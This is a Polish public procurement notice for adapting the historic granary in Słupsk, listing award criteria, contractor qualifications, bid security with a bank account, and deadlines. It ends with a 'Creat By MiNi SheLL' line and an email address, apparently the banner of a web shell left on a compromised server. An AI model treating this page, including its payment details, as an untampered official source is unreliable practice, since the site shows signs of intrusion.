class="normal">Opis kryteriów oceny ofert wraz z podaniem wag tych kryteriów i sposobu oceny ofert został określony<br/>w Rozdziale XX SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji jakości na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga spełnienia warunku udziału w postępowaniu, w zakresie zdolności technicznej lub zawodowej:<br/>1) Wykonawcy:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada wiedzę i doświadczenie, co należycie<br/>udokumentuje tj. wykaże, że w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa (upłynął) termin składania ofert<br/>w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie oraz<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej:<br/>Dwie (2) roboty budowlane na obiektach wpisanych do rejestru zabytków na kwotę minimum 3.000.000 zł brutto (każda z<br/>robót budowlanych).<br/>Ocena wykazania spełnienia warunku określonego powyżej w ust. 2 pkt 1) nastąpi na podstawie przedstawionych przez<br/>Wykonawcę dokumentów, o których mowa w rozdz. X ust. 1 pkt 1) lit. a) ) SWZ (wzór wykazu należycie wykonanych robót<br/>budowlanych stanowi załącznik nr 5 do SWZ).<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, wyżej wymieniony warunek<br/>udziału w postępowaniu winien spełniać w całości co najmniej jeden z wykonawców.<br/>Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych<br/>lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony jeżeli spełnia go w całości ten podmiot.<br/>UWAGA: W przypadku, gdy rozliczenie za zrealizowane (wykonane) przez Wykonawcę roboty budowlane nastąpiło w innej<br/>niż w PLN walucie, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu zobowiązany<br/>jest do przeliczenia wartości wykonanych robót budowlanych przyjmując średni kurs złotego w stosunku do walut obcych<br/>określony w tabeli kursów średnich walut obcych Narodowego Banku Polskiego opublikowanych na dzień zamieszczenia<br/>Ogłoszenia o zamówieniu oraz Specyfikacji Warunków Zamówienia na stronie internetowej prowadzonego postępowania.<br/>2) Osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że skieruje do realizacji zamówienia, osoby<br/>posiadające odpowiednie uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j.<br/>Dz. U. z 2021 poz. 2351 ze zm.), dalej nazywanej „ustawa Prawo budowlane”, niezbędnych do wykonania zamówienia tj.<br/>dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego następującymi<br/>osobami zdolnymi do wykonania zamówienia:<br/>a) jedną osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności<br/>konstrukcyjno-budowlanej w rozumieniu ustawy Prawo budowlane oraz Rozporządzenie Ministra Inwestycji i Rozwoju z dnia<br/>29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. 2019 poz. 831) – zwane dalej Rozporządzeniem, oraz posiadająca uprawnienia do kierowania<br/>robotami budowlanymi przy zabytkach nieruchomych wpisanych do rejestru zabytków - stosowanie do wymagań<br/>określonych w art. 37 c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (tj. Dz.U. z 2021 r. poz.<br/>710 z późn. zm.) jednocześnie legitymującą się minimum 3-letnim doświadczeniem zawodowym na stanowisku kierownika<br/>budowy przy robotach branży konstrukcyjno-budowlanej;<br/>b) osobą, która będzie pełniła funkcję kierownika robót branży sanitarnej, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych w rozumieniu ustawy Prawo budowlane oraz Rozporządzenia<br/>c) osobą, która będzie pełniła funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w<br/>rozumieniu ustawy Prawo budowlane oraz Rozporządzenia<br/>Zamawiający akceptuje odpowiadające powyższym ważne uprawnienia, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów prawa polskiego lub odpowiednie uprawnienia przysługujące na podstawie odrębnych przepisów<br/>prawa polskiego i wspólnotowego - w szczególności kwalifikacje zawodowe uznane na podstawie art. 12a ustawy Prawo<br/>budowlane lub prawo do tymczasowego i okazjonalnego wykonywania zawodu, o którym mowa w art. 20a ustawy z dnia 15<br/>grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz. U. z 2019 r. poz.<br/>1117 ze zm.) w zakresie niezbędnym do wykonania przedmiotu zamówienia).<br/>Ocena wykazania spełnienia warunku określonego powyżej w ust. 2 pkt 2) nastąpi na podstawie przedstawionych przez<br/>Wykonawcę dokumentów, o których mowa w rozdz. X ust. 1 pkt 1 lit. b) SWZ (wzór wykazu osób skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego stanowi załącznik nr 6 do SWZ).<br/>Zamawiający dopuszcza, aby jedna osoba pełniła więcej niż jedną funkcję, o ile spełnia wymagania stawiane osobom<br/>przewidzianym do pełnienia tych funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda<br/>podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym, Zamawiający dokona weryfikacji<br/>wyłącznie na podstawie oświadczenia wstępnego, o którym mowa w Rozdziale IX. ust. 2 pkt 1 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Zamawiający żąda podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu, tym<br/>samym:<br/>1) Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień<br/>złożenia, następujących podmiotowych środków dowodowych:<br/>a) wykaz robót budowlanych (według wzoru stanowiącego załącznik nr 5 do SWZ) - na potwierdzenie spełnienia warunku udziału w<br/>postępowaniu określonego w rozdz. VIII ust. 2 pkt 1) SWZ – wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty wykonania oraz podmiotów, na<br/>rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są:<br/>− referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane,<br/>− a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Wskazany 5-letni okres, o którym mowa powyżej należy liczyć wstecz od dnia, w którym upływa (upłynął) termin składania ofert w<br/>niniejszym postępowaniu.<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami,<br/>wykaz o którym mowa w ust. 1 pkt 1 lit a), dotyczy tylko tych robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio<br/>uczestniczył.<br/>b) wykaz osób (według wzoru stanowiącego załącznik nr 6 do SWZ), skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami (na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w rozdz. VIII ust. 2 pkt 2)<br/>SWZ).<br/>2) Jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio złożone podmiotowe środki dowodowe nie są już aktualne,<br/>Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych<br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające<br/>dostęp do tych środków.<br/>2. Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia. Tym samym,<br/>Zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia wstępnego, o którym mowa w Rozdziale IX. ust. 2 pkt 1 SWZ<br/>3. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, jakich może żądać Zamawiający od Wykonawcy, o których<br/>mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r., składa się w formie elektronicznej, w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, w formie pisemnej lub w formie dokumentowej, w<br/>zakresie i w sposób określony w przepisach rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.<br/>4. Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przez wykonawcę przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w kwocie: 100.000,00 zł . Wadium może być wniesione w jednej lub kilku<br/>następujących formach: pieniądzu; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu PARP. Wadium w<br/>formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego-UMWP w Gdańsku w banku: PKO Bank<br/>Polski S.A., numer rachunku 62 1020 1811 0000 0102 0312 3098 z adnotacją „Wadium - Adaptacja zabytkowego<br/>Spichlerza w Słupsku na cele kulturalne, społeczne, edukacyjne i turystyczne”. Do oferty zaleca się dołączyć dokument<br/>potwierdzający dokonanie przelewu. Wadium wnoszone w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu PARP, należy złożyć w formie oryginału w postaci elektronicznej. Polisa, poręczenie lub gwarancja stanowiąca<br/>formę wadium winna zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty<br/>wadium zgodnie z warunkami zaproszenia do składania ofert, następuje jego bezwarunkowa wypłata bez jakichkolwiek<br/>zastrzeżeń ze strony gwaranta/poręczyciela.<br/>Wadium należy wnieść przed upływem terminu składania ofert, przy czym wadium wniesione w pieniądzu za pomocą<br/>przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek<br/>Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Zamawiający zwraca wadium<br/>niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>upływu terminu związania z ofertą; zawarcia umowy w sprawie zamówienia publicznego; unieważnienia postępowania o<br/>udzielenie zamówienia z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie<br/>upłynął termin do jego wniesienia.<br/>Zamawiający, niezwłocznie , nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>który wycofał ofertę przed upływem terminu składania ofert; którego oferta została odrzucona,<br/>po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po<br/>unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie<br/>wpłynął termin do jego wniesienia. Zamawiający zwraca wadium wniesiono w pieniądzu zwraca je wraz z odsetkami<br/>wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia<br/>rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.<br/>Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi<br/>oświadczenia o zwolnieniu z wadium. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium<br/>wniesionego w formie gwarancji lub poręczenia, o których mowa w art.97 ust. 7 pkt 2-4, występuje odpowiednio do gwaranta<br/>lub poręczyciela z żądaniem zapłaty wadium, jeżeli: wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust.<br/>2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub<br/>przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1,<br/>oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie<br/>omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę<br/>jako najkorzystniejszej; wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia<br/>publicznego na warunkach określonych w ofercie, zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe<br/>z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wraz z ofertą należy złożyć oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, którego wzór<br/>stanowi załącznik nr 4 do<br/>SWZ:<br/>a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>b) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani<br/>dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy.<br/>- W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia zamawiający zbada, czy nie zachodzą<br/>podstawy wykluczenia wobec każdego z tych wykonawców.<br/>- 1. Wraz z ofertą należy złożyć:<br/>1) Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, którego wzór stanowi<br/>załącznik nr 3 do SWZ:<br/>Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale VII. ust. 2<br/>SWZ oraz spełnianiu warunków udziału<br/>w postępowaniu w zakresie wskazanym w rozdziale VIII. ust. 2 SWZ. Oświadczenie to stanowi dowód potwierdzający brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący<br/>wymagane podmiotowe środki dowodowe, wskazane w rozdziale X. SWZ.<br/>Oświadczenie składają odrębnie:<br/>każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>- W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych wykonawców albo do reprezentowania w postępowaniu i zawarciu umowy w<br/>sprawie zamówienia publicznego należy załączyć do oferty<br/>- W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia do oferty należy załączyć pełnomocnictwo<br/>dla pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>- Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców<br/>oraz pełnomocnictwa dla osób podpisujących umowę, jeśli ich umocowanie nie wynika z dokumentów załączonych do oferty<br/>lub umowy, o której mowa w niniejszym ustępie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana istotnych postanowień niniejszej umowy może nastąpić za zgodą obydwu stron wyrażoną na piśmie, w formie<br/>aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności takiej zmiany na zasadach określonych w § 12<br/>projektu umowy (załącznik nr 1 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">muzeum_mps/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W powodu problemów technicznych na Platformie e-zamówień i występującymi błędami w poniższym zakresie, informacje dot. Zamawiającego z Sekcji I zostały zamieszczone poniżej:<br/>1.1.) Rola zamawiającego<br/>Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania<br/>1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.<br/>Podmiot 1<br/>1.11.1.) Nazwa podmiotu prowadzącego postępowanie: Muzeum Pomorza Środkowego w Słupsku<br/>1.11.2.) Krajowy Numer Identyfikacyjny: REGON 000277807<br/>Adres podmiotu prowadzącego postępowanie:<br/>1.11.3.) Ulica: ul. Dominikańska 5-9<br/>1.11.4.) Miejscowość: Słupsk<br/>1.11.5.) Kod pocztowy: 76-200<br/>1.11.6.) Województwo: pomorskie<br/>1.11.7.) Kraj: Polska<br/>1.11.8.) Lokalizacja NUTS 3: PL636 - Słupski<br/>1.11.9.) Numer telefonu: 59 842 40 81<br/>1.11.10.) Numer faksu: 59 842 65 18<br/>1.11.11.) Adres poczty elektronicznej: sekretariat@muzeum.slupsk.pl<br/>1.11.12.) Adres strony internetowej: www. muzeum.slupsk.pl<br/><br/><br/>Postępowanie prowadzone jest przez pełnomocnika w oparciu o pełnomocnictwo Zarządu Województwa Pomorskiego<br/>udzielone na podstawie art. 37 ust. 2 i 4 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2021<br/>r. poz. 1129 z późn. zm.).:<br/>Muzeum Pomorza Środkowego w Słupsku<br/>76-200 Słupsk, ul. Dominikańska 5-9<br/>Adres poczty elektronicznej: sekretariat@muzeum.slupsk.pl<br/>ePUAP dostępny pod adresem: /muzeum_mps/SkrytkaESP<br/>NIP: 839 10 03 052<br/>REGON: 000277807<br/>O udzielenie przedmiotowego zamówienia mogą się ubiegać wykonawcy, którzy nie podlegają<br/>wykluczeniu na podstawie art. 108 ust.1 ustawy Pzp.<br/>Zamawiający wykluczy z postępowania o udzielenie zamówienia, na podstawie okoliczności<br/>wskazanych w art. 108 ust. 1 ustawy Pzp, które wystąpiły w odpowiednim okresie wskazanym<br/>w art. 111 ustawy Pzp.<br/>W Rozdziale IX SWZ zostały wskazane dokumenty składane wraz z ofertą.

Creat By MiNi SheLL
Email: jattceo@gmail.com